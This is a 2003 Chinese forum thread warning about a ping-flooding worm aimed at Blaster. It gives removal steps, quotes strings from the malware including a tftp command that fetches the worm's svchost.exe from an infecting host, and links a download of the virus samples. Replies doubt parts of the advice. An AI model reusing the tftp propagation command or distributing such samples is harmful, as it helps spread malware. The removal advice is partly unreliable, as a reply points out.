嘉定都市网

查看:1062 回复:7 发表于 2003-8-29 14:14

该用户从未签到

qrcode
跳转到指定楼层
楼主
发表于 2003-8-23 14:34:11 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

18日的反冲击波病毒……会狂ping啊……大家注意!! [复制链接]

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
下面是解决方法 !!!!!下面是解决方法!!!
停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
看到这2个服务就停止他们
Network connections Sharing
WINS Client
然后到WINS目录里删除这2个文件。。安装防护墙
如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒

DLLHOST.EXE里面有这样的话!
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ;; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ;; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ;; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ;; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ;; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ;; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ;; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ;; tftp -i %s get svchost.exe wins\\SVCHOST.EXE

如果正常,我就不是人了。。哈哈。。。这2个文件在WINS目录里。。

说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
如果是XP系统,那么这文件应该是在*:\\WINDOWS\\SYSTEM32\\WINS\\里
如果是NT系统..比如2000.那么就应该是在*:\\winnt\\system32\\wins\\里
这2个文件大家想研究可以在这里下
http://hy88.nease.net/pingvirus.rar

传染是利用TFTP上传的,,如果大家用不上这东东。完全可以删除TFTP.EXE


正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
如果你的防护墙被PING..那么你那里有一定有机器中了!!

这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING


!!下面是解决方法 !!!!!下面是解决方法!!!
停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
看到这2个服务就停止他们
Network connections Sharing
WINS Client
然后到WINS目录里删除这2个文件。。安装防护墙
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 转播转播 分享淘帖 支持支持 反对反对
回复

使用道具 打印 举报

  • TA的每日心情
    开心
    2016-8-19 06:00
  • 签到天数: 562 天

    [LV.9]以坛为家II

    沙发
    发表于 2003-8-26 08:14:59 | 只看该作者
    你在片人吗?
    不会中你的毒吧?
    回复 支持 反对

    使用道具 打印 举报

  • TA的每日心情
    无聊
    2014-4-17 22:09
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    板凳
    发表于 2003-8-26 08:54:27 | 只看该作者
    这个病毒是真的

    其初衷是好的,是为了对抗冲击波病毒,但是因为编译的不合理容易造成网络堵塞
    回复 支持 反对

    使用道具 打印 举报

    该用户从未签到

    地板
     楼主| 发表于 2003-8-26 11:30:02 | 只看该作者
    晕,不相信我阿,自己去瑞星网站看看
    绿盟也看看
    回复 支持 反对

    使用道具 打印 举报

    该用户从未签到

    5
    发表于 2003-8-26 12:26:32 | 只看该作者
    是啊
    回复 支持 反对

    使用道具 打印 举报

  • TA的每日心情
    擦汗
    2013-6-24 09:45
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    6
    发表于 2003-8-28 21:22:24 | 只看该作者
    这个东东偶中了很久了。。。。。。删除。。。说得挺简单 可是偶根本删不掉啊

    把注册表里所有有关这个程序的内容都删了  每次启动还是会自己运行。。。。。结束进程也不行。。。删除么 提示说源文件正在被使用。。。。。。。

    到底怎么删啊。。。。。
    回复 支持 反对

    使用道具 打印 举报

    该用户从未签到

    7
    发表于 2003-8-29 07:36:04 | 只看该作者
    如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了

    正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕



    上面这两段段话有待考证,又觉得彼此矛盾,希望楼主也能分析一下,不要照搬了别处的文章还不知道其中写了什么。
    回复 支持 反对

    使用道具 打印 举报

    该用户从未签到

    8
    发表于 2003-8-29 14:14:16 | 只看该作者
    没用,我的wins里面跟本没这2个文件的,可还是有人一直来ping我啊`~~~
    回复 支持 反对

    使用道具 打印 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    发表新贴 返回顶部